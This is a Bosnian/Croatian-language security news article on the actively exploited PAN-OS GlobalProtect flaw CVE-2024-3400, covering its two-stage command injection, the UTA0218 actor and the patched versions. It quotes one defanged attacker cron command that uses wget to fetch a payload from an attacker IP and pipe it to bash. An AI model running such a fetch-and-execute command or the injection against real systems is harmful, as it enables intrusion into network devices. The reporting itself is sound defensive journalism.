Palo Alto Networks je podijelio više detalja o kritičnom sigurnosnom propustu koji utiče na PAN-OS koji je bio pod aktivnom eksploatacijom od strane zlonamjernih hakera.
Kompanija je ranjivost, praćenu kao CVE-2024-3400 (CVSS rezultat: 10,0), opisala kao “zamršenu” i kombinaciju dvije greške u verzijama softvera PAN-OS 10.2, PAN-OS 11.0 i PAN-OS 11.1.
“U prvom, usluga GlobalProtect nije u dovoljnoj mjeri potvrdila format ID-a sesije prije nego što ih je sačuvala. Ovo je omogućilo napadaču da sačuva praznu datoteku s imenom datoteke koji je odabrao”, Chandan BN, viši direktor sigurnosti proizvoda u Palo Alto Networks, rekao je.
“Druga greška (vjerujući da su datoteke sistemski generisane) koristila je nazive datoteka kao dio naredbe.”
Vrijedi napomenuti da, iako nijedan od problema nije dovoljno kritičan sam po sebi, kada su povezani zajedno, mogli bi dovesti do neovlaštenog izvršavanja daljinske shell komande.
Palo Alto Networks je rekao da je haker koji stoji iza eksploatacije greške nultog dana, UTA0218, izveo napad u dvije faze kako bi postigao izvršenje komande na osjetljivim uređajima. Aktivnost se prati pod imenom Operation Midnight Eclipse.
Kao što su prethodno otkrili i Volexity i odjeljenje za obavještavanje prijetnji Unit 42 kompanije za mrežnu bezbjednost, ovo uključuje slanje posebno kreiranih zahtjeva koji sadrže komandu koja treba da se izvrši, a koja se zatim pokreće preko backdoor-a koji se zove UPSTYLE.
“Početno podešavanje mehanizma postojanosti od strane UTA0218 uključivalo je konfigurisanje cron posla koji bi koristio wget za preuzimanje korisnog opterećenja sa URL-a koji kontroliše napadač, a njegov izlaz je bio zapisan u stdout i proslijeđen bash-u za izvršenje”, primijetio je Volexity prošle sedmice.
“Napadač je koristio ovu metodu za implementaciju i izvršavanje određenih komandi i preuzimanje alata za reverzni proxy kao što je GOST (GO Simple Tunnel).”
Jedinica 42 je rekla da nije mogla odrediti komande koje se izvršavaju putem ovog mehanizma – wget -qO- hxxp://172.233.228[.]93/policy | bash – ali je procijenio da se implantat baziran na poslu cron vjerovatno koristi za obavljanje aktivnosti nakon eksploatacije.
“U fazi 1, napadač šalje pažljivo izrađenu shell komandu umjesto važećeg ID-a sesije GlobalProtect-u”, objasnio je Chandan. “Ovo rezultuje stvaranjem prazne datoteke na sistemu sa ugrađenom komandom kao imenom datoteke, prema izboru napadača.”
“U fazi 2, nesuđeni planirani sistemski posao koji se redovno izvodi koristi ime datoteke koju je dao napadač u komandi. Ovo rezultuje izvršavanjem komande koju je dostavio napadač s povišenim privilegijama.”
Iako je Palo Alto Networks u početku napomenuo da je za uspješnu eksploataciju CVE-2024-3400 potrebna firewall konfiguracija za GlobalProtect gateway ili GlobalProtect portal (ili oboje) i telemetriju uređaja da budu omogućeni, kompanija je od tada potvrdila da telemetrija uređaja nema uticaja na problem.
Ovo se zasniva na novim nalazima Bishopa Foxa, koji je otkrio obilaznice za naoružanje greške tako da ne zahtijeva telemetriju da bude omogućena na uređaju kako bi se infiltrirao u njega.
Kompanija je također proširila zakrpe za propust izvan primarnih verzija u posljednjih nekoliko dana kako bi pokrila druga izdanja za održavanje koja se često koriste –
- PAN-OS 10.2.9-h1
- PAN-OS 10.2.8-h3
- PAN-OS 10.2.7-h8
- PAN-OS 10.2.6-h3
- PAN-OS 10.2.5-h6
- PAN-OS 10.2.4-h16
- PAN-OS 10.2.3-h13
- PAN-OS 10.2.2-h5
- PAN-OS 10.2.1-h2
- PAN-OS 10.2.0-h3
- PAN-OS 11.0.4-h1
- PAN-OS 11.0.4-h2
- PAN-OS 11.0.3-h10
- PAN-OS 11.0.2-h4
- PAN-OS 11.0.1-h4
- PAN-OS 11.0.0-h3
- PAN-OS 11.1.2-h3
- PAN-OS 11.1.1-h1
- PAN-OS 11.1.0-h3
U svjetlu aktivne zloupotrebe CVE-2024-3400 i dostupnosti koda za iskorištavanje dokaza o konceptu (PoC), korisnicima se preporučuje da preduzmu korake za primjenu hitnih popravki što je prije moguće kako bi se zaštitili od potencijalnih prijetnji.
Američka agencija za sajber i infrastrukturnu sigurnost (CISA) je također dodala nedostatak u svoj katalog poznatih eksploatisanih ranjivosti (KEV), naloživši federalnim agencijama da osiguraju svoje uređaje do 19. aprila 2024. godine.
Prema informacijama koje je podijelila Shadowserver Foundation, otprilike 22.542 Internet-izloženih firewall uređaja vjerovatno su ranjiva na CVE-2024-3400. Većina uređaja nalazi se u SAD-u, Japanu, Indiji, Njemačkoj, Velikoj Britaniji, Kanadi, Australiji, Francuskoj i Kini od 18. aprila 2024.
Izvor: The Hacker News
